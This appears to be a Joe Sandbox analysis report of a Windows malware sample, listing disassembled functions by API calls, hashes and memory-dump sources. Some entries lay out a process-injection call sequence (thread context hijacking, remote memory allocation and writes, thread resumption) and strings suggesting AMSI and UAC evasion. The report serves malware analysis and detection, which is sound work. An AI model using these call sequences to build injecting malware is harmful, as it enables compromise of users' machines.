                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeFromProgString
                                                          • String ID:
                                                          • API String ID: 4225568880-0
                                                          • Opcode ID: 8143f5a779a5fa5c08896ee544cff83bdf67b522d9ceeef0035c5efb1caedf99
                                                          • Instruction ID: f10e25d9ae2363a2a167edf03fe7f84f8c367d0aeca2d4e92bf34b31a1804805
                                                          • Opcode Fuzzy Hash: 8143f5a779a5fa5c08896ee544cff83bdf67b522d9ceeef0035c5efb1caedf99
                                                          • Instruction Fuzzy Hash: 0DE0A03E20020CAFE311FA6A9C9194E77ADDF8A710B5104B2A600D2580DA316E108861
                                                          Function 028F5868 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(028F0000,?,00000105), ref: 028F5886
                                                            • Part of subcall function 028F5ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,028F0000,0291E790), ref: 028F5AE8
                                                            • Part of subcall function 028F5ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,028F0000,0291E790), ref: 028F5B06
                                                            • Part of subcall function 028F5ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,028F0000,0291E790), ref: 028F5B24
                                                            • Part of subcall function 028F5ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 028F5B42
                                                            • Part of subcall function 028F5ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,028F5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 028F5B8B
                                                            • Part of subcall function 028F5ACC: RegQueryValueExA.ADVAPI32(?,028F5D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,028F5BD1,?,80000001), ref: 028F5BA9
                                                            • Part of subcall function 028F5ACC: RegCloseKey.ADVAPI32(?,028F5BD8,00000000,?,?,00000000,028F5BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 028F5BCB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Open$FileModuleNameQueryValue$Close
                                                          • String ID:
                                                          • API String ID: 2796650324-0
                                                          • Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                          • Instruction ID: c294ad992d8bd94d6c3c5f31d913b98d7560a9cb41abc76013909b75c2e70d18
                                                          • Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                          • Instruction Fuzzy Hash: 61E06D79A003149FCB50DE9CC8C4B4733D8AB08750F440961EE58CF346D7B4D9608BD1
                                                          Function 028F7DE0 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 028F7DF4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileWrite
                                                          • String ID:
                                                          • API String ID: 3934441357-0
                                                          • Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                          • Instruction ID: d749405eb78f1057c62dfb4422e47c813cfb532c69dadafafae2ced4f656b156
                                                          • Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                          • Instruction Fuzzy Hash: F8D05BBA3091507AE224965F5D44EA75BDCCBC6770F10473EF668C7180E7208C05C771
                                                          Function 028F4C78 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeString
                                                          • String ID:
                                                          • API String ID: 3341692771-0
                                                          • Opcode ID: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                          • Instruction ID: af0a6db11caf88e741c81a036cf46f826f7317f1e83f6ee8e9373668da424d1e
                                                          • Opcode Fuzzy Hash: 2e328a45cd58c208c03ca67c8e7eeb38812660f114415d6457ecd42c0c7951bb
                                                          • Instruction Fuzzy Hash: A2C012AE60023097FBA19699ACC475363CC9B05295B1500A2D708D7250E374D80046A1
                                                          Function 028F7E80 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetFileAttributesA.KERNEL32(00000000,?,0291356F,ScanString,02977380,0291B7B8,OpenSession,02977380,0291B7B8,ScanBuffer,02977380,0291B7B8,OpenSession,02977380,0291B7B8,Initialize), ref: 028F7E8B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                          • Instruction ID: 410dbea8ee59e28dafc556db8139491c86078c2224acd5eb61adb03fe4f06c4e
                                                          • Opcode Fuzzy Hash: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                          • Instruction Fuzzy Hash: F4C08CFE3112010A2EE0A5FC1CC421A43990984135B601F23EB3CCA2D2F31A98222822
                                                          Function 028F7E5C Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetFileAttributesA.KERNEL32(00000000,?,0291041F,ScanString,02977380,0291B7B8,OpenSession,02977380,0291B7B8,ScanString,02977380,0291B7B8,UacScan,02977380,0291B7B8,UacInitialize), ref: 028F7E67
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AttributesFile
                                                          • String ID:
                                                          • API String ID: 3188754299-0
                                                          • Opcode ID: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                          • Instruction ID: e49dfbfca35ef0dbe1e4708ede6954e8aac7214e247de2f61e9191a5b3aaba49
                                                          • Opcode Fuzzy Hash: b941db7ab817fb70c4c787fb81e96e0e2b9547ca50c7f884e0651a38d8287ef1
                                                          • Instruction Fuzzy Hash: 70C08CAC3012010A6AD065BC2CC424A538A0D042397640B23AB3CC62E2F32698A32812
                                                          Function 0291C35C Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • timeSetEvent.WINMM(00002710,00000000,0291C350,00000000,00000001), ref: 0291C36C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Eventtime
                                                          • String ID:
                                                          • API String ID: 2982266575-0
                                                          • Opcode ID: c42fc32bdf70ea5a9f2b6adf87ad1528483a4751f0ee086d4570fb022f563f4d
                                                          • Instruction ID: 7e43b029b8af8449d902acdd7a79b86461cce64a9e169a10e6a36b621f28de1b
                                                          • Opcode Fuzzy Hash: c42fc32bdf70ea5a9f2b6adf87ad1528483a4751f0ee086d4570fb022f563f4d
                                                          • Instruction Fuzzy Hash: C7C048B67903042AFA10A6AA5C82F26569D9705B10F100812B704EA2C2D6A2A9114E69
                                                          Function 028F4C38 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SysAllocStringLen.OLEAUT32(00000000,?), ref: 028F4C3F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocString
                                                          • String ID:
                                                          • API String ID: 2525500382-0
                                                          • Opcode ID: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                          • Instruction ID: 1cb7021cf275ed473819465a34e6371c5b4c4e290c818da43a9ecc325871e971
                                                          • Opcode Fuzzy Hash: c6798f38304dee73ceb65798926069c1248633c6a97c564d7c3bc885b6e1b3e2
                                                          • Instruction Fuzzy Hash: 4EB0123D20820955FAD833A20F00733034C0B4028AF8520539F1CC80E4FB21C0119836
                                                          Function 028F4C50 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SysFreeString.OLEAUT32(00000000), ref: 028F4C57
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeString
                                                          • String ID:
                                                          • API String ID: 3341692771-0
                                                          • Opcode ID: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                          • Instruction ID: 4d9fc28f8c48161be9183dda707974159fc502c1d44b26a97ecc3e4ec0c90a0d
                                                          • Opcode Fuzzy Hash: 05d179978c84ba0f1e4fbba25b3378a330cde3301f36e90d6d70bb160c3e4cb6
                                                          • Instruction Fuzzy Hash: DEA022AC0003038AAF8B33AC002002F23333FE03003C8C0E88308CA000EF3B8000AC30
                                                          Function 028F15CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,028F1A03,?,028F1FC1), ref: 028F15E2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 548778e6262092158f809bc620430a26c0e89349a69a355fec6274b61f3180b7
                                                          • Instruction ID: bcd5026a576e91c281164a8e1b0524b9616d1c2359edbde808a6e8d2e621d225
                                                          • Opcode Fuzzy Hash: 548778e6262092158f809bc620430a26c0e89349a69a355fec6274b61f3180b7
                                                          • Instruction Fuzzy Hash: BAF06DF4B463008FDB49CFB999443117BF2E78A345F108579D709DB399E77184058B00
                                                          Function 028F1682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,028F1FC1), ref: 028F16A4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          • Opcode ID: 50cb40f26ddb3f6845dd52145b5c2d3d6b7cc29ef23002aefd177f898e725c26
                                                          • Instruction ID: 37bd0d0c8b506864b3630cdfd28bf94b1873433662d9f35a72790bf9dcbb6c0c
                                                          • Opcode Fuzzy Hash: 50cb40f26ddb3f6845dd52145b5c2d3d6b7cc29ef23002aefd177f898e725c26
                                                          • Instruction Fuzzy Hash: CBF0BEBAB44B95ABD7109F5E9C84B92BB98FB50365F050139FA0CDB340D770A8148B94
                                                          Function 028F16E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,028F1FE4), ref: 028F1704
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FreeVirtual
                                                          • String ID:
                                                          • API String ID: 1263568516-0
                                                          • Opcode ID: 6f77699bbffeb42c5eaafab776037e938ce7a7a05fef5ba15b51bf4ae5ae778e
                                                          • Instruction ID: 878935349d781190eaa3e7cb33b5f1d5d524e9ba1b7d739206ba9ac9fc7ca3ae
                                                          • Opcode Fuzzy Hash: 6f77699bbffeb42c5eaafab776037e938ce7a7a05fef5ba15b51bf4ae5ae778e
                                                          • Instruction Fuzzy Hash: 8CE0867D300301EFD7505A7D5D88712ABDCEB54654F144475F70DDB245D370E8148B60

                                                          Non-executed Functions

                                                          Function 0290AB1C Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,0290ADA3,?,?,0290AE35,00000000,0290AF11), ref: 0290AB30
                                                          • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 0290AB48
                                                          • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 0290AB5A
                                                          • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 0290AB6C
                                                          • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 0290AB7E
                                                          • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 0290AB90
                                                          • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 0290ABA2
                                                          • GetProcAddress.KERNEL32(00000000,Process32First), ref: 0290ABB4
                                                          • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 0290ABC6
                                                          • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 0290ABD8
                                                          • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 0290ABEA
                                                          • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 0290ABFC
                                                          • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 0290AC0E
                                                          • GetProcAddress.KERNEL32(00000000,Module32First), ref: 0290AC20
                                                          • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 0290AC32
                                                          • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 0290AC44
                                                          • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 0290AC56
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressProc$HandleModule
                                                          • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                          • API String ID: 667068680-597814768
                                                          • Opcode ID: 8b2c9906b84657b037764c61993c128169df12234fd0922d9d148f7a342acfbf
                                                          • Instruction ID: 839f42153c0dd02fadd94e4b7bbad30d9c7722bdca32848183e9204d205866a7
                                                          • Opcode Fuzzy Hash: 8b2c9906b84657b037764c61993c128169df12234fd0922d9d148f7a342acfbf
                                                          • Instruction Fuzzy Hash: 6031EEF8A84364DFEF40EFB8D8C4A6977A9AF55701B000E61A611CF285F778A854CF52
                                                          Function 02908D70 Relevance: 45.4, APIs: 3, Strings: 22, Instructions: 1654threadnativeinjectionCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 029089D0: FreeLibrary.KERNEL32(74D10000,00000000,00000000,00000000,00000000,0297738C,Function_0000662C,00000004,0297739C,0297738C,05F5E103,00000040,029773A0,74D10000,00000000,00000000), ref: 02908AAA
                                                            • Part of subcall function 02908788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02908814
                                                          • GetThreadContext.KERNEL32(00000000,02977424,ScanString,029773A8,0290A93C,UacInitialize,029773A8,0290A93C,ScanBuffer,029773A8,0290A93C,ScanBuffer,029773A8,0290A93C,UacInitialize,029773A8), ref: 02909602
                                                            • Part of subcall function 02907A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02907A9F
                                                            • Part of subcall function 02907D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02907DEC
                                                          • SetThreadContext.KERNEL32(00000000,02977424,ScanBuffer,029773A8,0290A93C,ScanString,029773A8,0290A93C,Initialize,029773A8,0290A93C,00000000,-00000008,029774FC,00000004,02977500), ref: 0290A317
                                                          • NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,02977424,ScanBuffer,029773A8,0290A93C,ScanString,029773A8,0290A93C,Initialize,029773A8,0290A93C,00000000,-00000008,029774FC), ref: 0290A324
                                                            • Part of subcall function 0290894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,029773A8,0290A587,ScanString,029773A8,0290A93C,ScanBuffer,029773A8,0290A93C,Initialize,029773A8,0290A93C,UacScan), ref: 02908960
                                                            • Part of subcall function 0290894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 0290897A
                                                            • Part of subcall function 0290894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,029773A8,0290A587,ScanString,029773A8,0290A93C,ScanBuffer,029773A8,0290A93C,Initialize), ref: 029089B6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2122620096.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                                                          • Associated: 00000000.00000002.2122599698.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.00000000029EF000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000000.00000002.2123141116.0000000002A6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_28f0000_XjPA2pnUhC.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: LibraryThread$ContextFreeMemoryVirtual$AddressAllocateCreateLoadProcProcessResumeUserWrite
